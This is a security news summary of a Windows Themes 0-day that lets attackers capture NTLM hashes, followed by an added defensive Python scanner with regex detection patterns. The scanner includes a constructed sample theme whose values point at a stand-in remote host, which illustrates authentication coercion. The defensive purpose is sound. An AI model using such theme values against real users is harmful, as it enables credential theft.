October 29, 2024 at 06:05PM
A recently reported 0-day vulnerability affects all Windows client versions from 7 to 11 and allows attackers to capture NTLM authentication hashes through authentication coercion. ACROS Security discovered the flaw while working on a patch for another Windows Themes vulnerability; exploitation requires user interaction with a manipulated theme file. Microsoft has acknowledged the report and says it will take the necessary action.
### Meeting Takeaways
1. **Vulnerability Overview:**
   - All Windows client versions from Windows 7 to Windows 11 have a 0-day vulnerability that may allow attackers to capture NTLM authentication hashes.
2. **Discovery and Reporting:**
   - The vulnerability was reported to Microsoft by ACROS Security during their work on patching CVE-2024-38030, a previously identified Windows Themes spoofing vulnerability.
3. **Related Vulnerabilities:**
   - The newly discovered flaw is similar to two earlier vulnerabilities (CVE-2024-21320 and CVE-2024-38030) in Windows Themes, both caused by improper path validation that leads to authentication coercion attacks.
4. **Mechanism of Attack:**
   - Attackers could exploit this vulnerability by using manipulated themes to trick vulnerable devices into sending NTLM hashes to their server.
5. **Recommendations:**
   - Organizations are advised to disable NTLM where feasible; however, this may break functionality if certain network components depend on NTLM.
6. **Potential Exploitation Requirements:**
   - Successful exploitation requires the user to interact with a malicious theme file, either by manually copying it or by unintentionally downloading it from an attacker's website.
7. **Microsoft's Response:**
   - Microsoft is aware of the vulnerability report and will take the necessary actions, but has not yet issued a CVE for this particular issue.
8. **Difficulties in Fixing:**
   - Addressing the vulnerability may be complicated by the complex nature of UNC paths and the possibility that additional vulnerable key/value pairs were overlooked in prior patches.
9. **Future Actions:**
   - ACROS plans to release more details and a proof-of-concept after Microsoft publishes its patch.
10. **Nature of Attack:**
   - Exploitation is more likely to occur in targeted campaigns rather than mass exploitation, because the attack requires user interaction and network reachability of the attacker's server to succeed.
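Items 4 and 8 above describe the defender's problem: a `.theme` file is plain INI-style text, and any key/value pair whose value names a remote location (a UNC path) can cause Windows to reach out to that host and authenticate with NTLM, while the exact set of affected keys is not stated on this page. The scanner below, added here as an example and not code from the article, ACROS Security or Microsoft, therefore does not try to know which keys are dangerous; it parses every key/value pair in a theme file and flags any value that points at a remote host. The sample theme text, its key names and the TEST-NET address `203.0.113.10` are constructed for the example.

```python
"""Scan Windows .theme files (INI-style key=value text) for values that
point at remote hosts: UNC paths, forward-slash UNC paths and file:// URLs.

Added example for this page, not code from the article, ACROS or Microsoft.
Which theme keys Windows resolves over the network is not stated on the page,
so every key/value pair is checked rather than a fixed list of keys.
"""
import re
import sys
from typing import List, Tuple

# Value shapes that name a remote location instead of a local file.
# Local device paths such as \\.\pipe\name are deliberately not matched.
REMOTE_PATTERNS = [
    re.compile(r"^\\\\[^\\?.][^\\]*\\"),   # \\server\share\...
    re.compile(r"^\\\\\?\\UNC\\", re.I),   # \\?\UNC\server\share\...
    re.compile(r"^//[^/]+/"),              # //server/share/... (forward slashes)
    re.compile(r"^file://", re.I),         # file://server/share/...
]

# Constructed sample theme text (not a real-world sample). Two values point
# at a remote host; the Wallpaper value is a normal local path.
SAMPLE_THEME = r"""
; constructed sample theme file
[Theme]
DisplayName=Constructed Theme

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Web\Wallpaper\Windows\img0.jpg

[VisualStyles]
Path=\\203.0.113.10\share\styles.msstyles
ColorStyle=NormalColor

[Slideshow]
ImagesRootPath=//203.0.113.10/share/images
"""


def parse_theme(text: str) -> List[Tuple[str, str, str]]:
    """Parse INI-style theme text into (section, key, value) triples.

    Hand-rolled rather than configparser because theme files may repeat
    keys and use backslashes in section names like [Control Panel\Desktop].
    """
    section = ""
    triples: List[Tuple[str, str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            triples.append((section, key.strip(), value.strip().strip('"')))
    return triples


def is_remote_reference(value: str) -> bool:
    """True when the value names a host on the network rather than a local file."""
    return any(p.search(value) for p in REMOTE_PATTERNS)


def find_remote_references(text: str) -> List[Tuple[str, str, str]]:
    """Return every (section, key, value) whose value points at a remote host."""
    return [t for t in parse_theme(text) if is_remote_reference(t[2])]


def scan_file(path: str) -> List[Tuple[str, str, str]]:
    """Scan a .theme file on disk; theme files are ANSI/UTF-16 text, so
    decode with errors ignored rather than failing on an odd byte."""
    with open(path, "rb") as fh:
        data = fh.read()
    text = data.decode("utf-16") if data[:2] in (b"\xff\xfe", b"\xfe\xff") \
        else data.decode("utf-8", errors="ignore")
    return find_remote_references(text)


if __name__ == "__main__":
    # With no arguments, scan the constructed sample; otherwise scan the given files.
    targets = sys.argv[1:]
    results = ([("<sample>", r) for r in find_remote_references(SAMPLE_THEME)]
               if not targets else
               [(p, r) for p in targets for r in scan_file(p)])
    for origin, (section, key, value) in results:
        print(f"{origin}: [{section}] {key} -> {value}")
```

A theme that legitimately references a local file never needs a UNC value, so any hit is worth quarantining and reviewing before the file is applied; running the scanner over mail-gateway or download-folder samples is a low-cost compensating control while the patch is outstanding. It complements, rather than replaces, the article's recommendation to restrict NTLM where the environment allows it.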